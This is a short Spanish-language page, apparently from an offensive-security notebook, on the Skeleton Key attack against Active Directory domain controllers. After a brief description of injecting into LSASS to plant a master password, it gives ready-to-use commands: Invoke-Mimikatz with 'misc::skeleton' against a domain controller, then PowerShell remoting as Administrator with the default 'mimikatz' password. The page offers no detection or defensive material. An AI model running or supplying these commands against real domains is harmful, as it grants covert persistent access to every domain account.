Skeleton Key

Descripción

Skeleton Key es un ataque de persistencia que se inyecta en el proceso LSASS (Local Security Authority Subsystem Service) y crea una contraseña maestra que funcionará para cualquier cuenta de dominio. Las contraseñas existentes seguirán funcionando, por lo que es difícil saber si se ha producido este ataque. Al reiniciar el controlador de dominio se eliminarán los cambios realizados por dicho ataque, el cual, para poder perpetrarlo se debe tener una cuenta con privilegios de administrador de dominio.

Invoke-Mimikatz

1) Ejecución de ataque Skeleton Key utilizando Invoke-Mimikatz.

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC01.ACME.LOCAL>

2) PowerShell remoting al host administrador del dominio con usuario Administrator y contraseña por defecto mimikatz.

$UserPassword = ConvertTo-SecureString "mimikatz" -AsPlainText -Force
$UserCredential = New-Object System.Management.Automation.PSCredential ("<ACME.LOCAL>\Administrator", $UserPassword)
Enter-PSSession -ComputerName <DC01.ACME.LOCAL> -Credential $UserCredential

AnteriorSilver Ticket SiguienteDirectory Services Restore Mode (DSRM)

Última actualización hace 1 año